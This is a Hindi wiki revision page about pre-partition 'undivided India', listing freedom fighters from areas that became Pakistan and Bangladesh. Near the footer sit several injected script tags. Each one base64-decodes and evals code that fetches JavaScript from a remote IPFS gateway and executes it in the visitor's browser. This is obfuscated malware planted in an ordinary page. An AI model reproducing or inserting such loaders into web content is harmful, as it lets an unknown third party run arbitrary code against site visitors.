Difference between revisions of "अविभाजित हिन्दुस्तान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पृथक " to "पृथक् ")
 
Line 1: Line 1:
 
[[चित्र:British india1.png|thumb|300px|left|ब्रिटिश भारत]][[चित्र:British india.png|thumb|300px|right|अविभाजित हिन्दुस्तान]]
 
[[चित्र:British india1.png|thumb|300px|left|ब्रिटिश भारत]][[चित्र:British india.png|thumb|300px|right|अविभाजित हिन्दुस्तान]]
'''अविभाजित हिन्दुस्तान''' स्वतंत्रता प्राप्त करने से पूर्व के [[भारत]] को कहा जाता है। [[15 अगस्त]] [[1947]] को स्वतंत्रता प्राप्त करने से पूर्व भारत की सीमा में भौगोलिक रूप से वर्तमान [[पाकिस्तान]] तथा [[बंगला देश]] सम्मिलित थे जिसे सामान्यतः अविभाजित भारत अथवा अविभाजित हिन्दुस्तान अथवा ब्रिटिश भारत के नाम से जाना जाता है। [[भारतीय स्वतंत्रता आन्दोलन]] के अनेक [[साँचा:स्वतन्त्रता सेनानी|स्वतन्त्रता सेनानी]] अविभाजित भारत के उन हिस्सों के हैं जो स्वतंत्रता के बाद [[भारत]] देश से पृथक होकर [[पाकिस्तान]] और [[बंगला देश]] नामक नये राष्ट्र बन चुके हैं।
+
'''अविभाजित हिन्दुस्तान''' स्वतंत्रता प्राप्त करने से पूर्व के [[भारत]] को कहा जाता है। [[15 अगस्त]] [[1947]] को स्वतंत्रता प्राप्त करने से पूर्व भारत की सीमा में भौगोलिक रूप से वर्तमान [[पाकिस्तान]] तथा [[बंगला देश]] सम्मिलित थे जिसे सामान्यतः अविभाजित भारत अथवा अविभाजित हिन्दुस्तान अथवा ब्रिटिश भारत के नाम से जाना जाता है। [[भारतीय स्वतंत्रता आन्दोलन]] के अनेक [[साँचा:स्वतन्त्रता सेनानी|स्वतन्त्रता सेनानी]] अविभाजित भारत के उन हिस्सों के हैं जो स्वतंत्रता के बाद [[भारत]] देश से पृथक् होकर [[पाकिस्तान]] और [[बंगला देश]] नामक नये राष्ट्र बन चुके हैं।
 
*भारत के उन हिस्सों के अनेक [[साँचा:स्वतन्त्रता सेनानी|स्वतंत्रता सेनानियों]] ने भी [[भारतीय स्वतंत्रता आन्दोलन]] में योगदान दिया है जिसमें से प्रमुख हैं- [[जे. बी. कृपलानी]], [[ख़ान अब्दुलगफ़्फ़ार ख़ान]],  [[मुहम्मद अली जिन्ना]], [[ख़्वाजा नजीमुद्दीन]], [[कनाईलाल दत्त]], [[लाला हरदयाल]], [[जयरामदास दौलतराम]], [[ज्ञानचंद्र मजूमदार]], [[खलीकुज्जमा]], [[त्रैलोक्य चक्रवर्ती]], [[पंडित रूपचंद]], [[लीला नाग]], [[विपिन चन्द्र पाल]] आदि।
 
*भारत के उन हिस्सों के अनेक [[साँचा:स्वतन्त्रता सेनानी|स्वतंत्रता सेनानियों]] ने भी [[भारतीय स्वतंत्रता आन्दोलन]] में योगदान दिया है जिसमें से प्रमुख हैं- [[जे. बी. कृपलानी]], [[ख़ान अब्दुलगफ़्फ़ार ख़ान]],  [[मुहम्मद अली जिन्ना]], [[ख़्वाजा नजीमुद्दीन]], [[कनाईलाल दत्त]], [[लाला हरदयाल]], [[जयरामदास दौलतराम]], [[ज्ञानचंद्र मजूमदार]], [[खलीकुज्जमा]], [[त्रैलोक्य चक्रवर्ती]], [[पंडित रूपचंद]], [[लीला नाग]], [[विपिन चन्द्र पाल]] आदि।
  

Latest revision as of 13:26, 1 August 2017

thumb|300px|left|british bharatthumb|300px|right|avibhajit hindustan avibhajit hindustan svatantrata prapt karane se poorv ke bharat ko kaha jata hai. 15 agast 1947 ko svatantrata prapt karane se poorv bharat ki sima mean bhaugolik roop se vartaman pakistan tatha bangala desh sammilit the jise samanyatah avibhajit bharat athava avibhajit hindustan athava british bharat ke nam se jana jata hai. bharatiy svatantrata andolan ke anek svatantrata senani avibhajit bharat ke un hissoan ke haian jo svatantrata ke bad bharat desh se prithakh hokar pakistan aur bangala desh namak naye rashtr ban chuke haian.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahamani vansh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>